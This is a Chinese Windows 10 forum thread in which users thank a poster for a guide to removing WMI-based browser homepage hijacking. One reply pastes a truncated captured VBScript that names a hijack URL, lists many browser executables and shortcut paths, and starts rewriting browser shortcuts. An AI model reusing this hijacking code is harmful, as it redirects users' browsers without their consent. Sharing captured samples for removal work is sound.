Win10论坛

Win10正式版系统下载主题平板

重定义Modern UI,打造完美Windows全新体验

Windows10下载|安装|新手宝典|必备软件

搜索
楼主: Wayne_cen

[技术] 抓“虫”---主页被WMI方法劫持的解救方法和工具     [复制链接]

Rank: 5Rank: 5Rank: 5

UID
731959
帖子
633
PB币
8802
贡献
0
技术
10
活跃
897

7周年庆典勋章 8周年庆典勋章

发表于 2017-3-8 22:02:48 |显示全部楼层
办公室跟家里的电脑都被劫持过

Rank: 2Rank: 2

UID
1165067
帖子
153
PB币
4
贡献
0
技术
0
活跃
258
发表于 2017-3-8 23:13:58 |显示全部楼层
终于看到解决办法了

Rank: 5Rank: 5Rank: 5

UID
60921
帖子
801
PB币
2062
贡献
0
技术
4
活跃
669
发表于 2017-3-9 07:05:23 |显示全部楼层
cjy__05 发表于 2017-3-1 17:35
网吧很多电脑也是主页被改 非常顽固 不知道是不是这种方式

网吧里不用这么弱的方法。网吧里都是用Rootkit,就是一种合法病毒。

Rank: 1

UID
993714
帖子
105
PB币
253
贡献
0
技术
0
活跃
363
发表于 2017-3-9 14:09:13 |显示全部楼层
谢谢分享!

Rank: 2Rank: 2

UID
4805881
帖子
99
PB币
208
贡献
0
技术
0
活跃
41

Win10先驱者

发表于 2017-3-9 15:14:32 |显示全部楼层
感谢楼主分享!!!

Rank: 1

UID
374968
帖子
82
PB币
351
贡献
0
技术
0
活跃
146
发表于 2017-3-11 19:53:03 |显示全部楼层
标记一下,以备日后使用,谢谢分享

Rank: 5Rank: 5Rank: 5

UID
149917
帖子
1045
PB币
2299
贡献
0
技术
0
活跃
670
发表于 2017-3-11 20:05:18 |显示全部楼层

感谢分享!收藏备用。

小猪哥

Rank: 7Rank: 7Rank: 7

UID
128865
帖子
1495
PB币
3155
贡献
0
技术
9
活跃
1698
发表于 2017-3-12 23:29:37 |显示全部楼层
在WMI Event Registration Editor 中,注册了一个VBSScriptLKKDS_filter脚本事件   这个看不懂,怎么弄出来的,楼主??

Rank: 2Rank: 2

UID
1129618
帖子
315
PB币
2395
贡献
0
技术
0
活跃
531
发表于 2017-3-20 09:52:27 |显示全部楼层
Wayne_cen 发表于 2017-3-2 11:58
运营商都是DNS劫持,我只听过,没遇到过。

嗯,无缘无故跳出来的广告窗口,应该就是

Rank: 5Rank: 5Rank: 5

UID
1095963
帖子
358
PB币
1764
贡献
0
技术
0
活跃
296
发表于 2017-3-20 21:07:26 |显示全部楼层
感谢楼主分享!收藏备用。

Rank: 2Rank: 2

UID
4329620
帖子
193
PB币
538
贡献
0
技术
0
活跃
772
发表于 2017-3-20 22:19:19 |显示全部楼层
这个刚好用得着,谢谢分享

Rank: 2Rank: 2

UID
4811928
帖子
227
PB币
43
贡献
0
技术
0
活跃
174
发表于 2017-3-22 09:45:58 来自手机 |显示全部楼层
写得比较详细,点赞!这个方法的确是对于浏览器老是被劫持,又不知问题出在那里的一种好教程!非常感谢

Rank: 2Rank: 2

UID
3131758
帖子
239
PB币
176
贡献
0
技术
0
活跃
764
发表于 2017-3-22 10:17:12 |显示全部楼层
十分感谢楼主,之前试过很多方法,都没有用

Rank: 5Rank: 5Rank: 5

UID
1037448
帖子
1012
PB币
1298
贡献
0
技术
0
活跃
1581
发表于 2017-3-22 10:41:47 |显示全部楼层
hao123是比较恶心的

Rank: 2Rank: 2

UID
2406535
帖子
416
PB币
86
贡献
0
技术
0
活跃
706
发表于 2017-3-22 10:42:59 |显示全部楼层
谢谢。这种过程可以让后来者,借鉴

Rank: 2Rank: 2

UID
3131758
帖子
239
PB币
176
贡献
0
技术
0
活跃
764
发表于 2017-3-22 10:45:08 |显示全部楼层
已经成功删除,再次感谢,么么哒

Rank: 1

UID
695712
帖子
94
PB币
0
贡献
0
技术
0
活跃
127
发表于 2017-3-22 10:54:07 |显示全部楼层
cha ge biao ji!~~~

Rank: 7Rank: 7Rank: 7

UID
38032
帖子
2287
PB币
8909
贡献
0
技术
7
活跃
1828
发表于 2017-3-22 11:51:49 |显示全部楼层
1这是高手啊

Rank: 2Rank: 2

UID
943100
帖子
130
PB币
166
贡献
0
技术
0
活跃
1058
发表于 2017-3-22 21:44:11 |显示全部楼层
非常感谢,按照你提供的方法,我也捉到了“虫”

氺氺

Rank: 15Rank: 15Rank: 15

UID
3805006
帖子
15038
PB币
10
贡献
0
技术
81
活跃
12687

小白鼠勋章II代 远景美化达人 8周年庆典勋章

发表于 2017-3-23 13:24:13 |显示全部楼层
  1. On Error Resume Next:Const link = "http://hao642.com/?r=gameall&m=c37":Const link360 = "http://hao642.com/?r=gameall&m=c37&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\kfc\Desktop,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\kfc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LC
复制代码
抓到了一个,谢谢!
回顶部
Copyright (C) 2005-2019 pcbeta.com, All rights reserved
Powered by Discuz!  苏ICP备17027154号
请勿发布违反中华人民共和国法律法规的言论,会员观点不代表远景论坛官方立场。
远景在线 | 远景论坛 | 苹果论坛 | Win10论坛 | Win8论坛 | Win7论坛 | WP论坛 | Office论坛 | 电脑硬件 | 安卓软件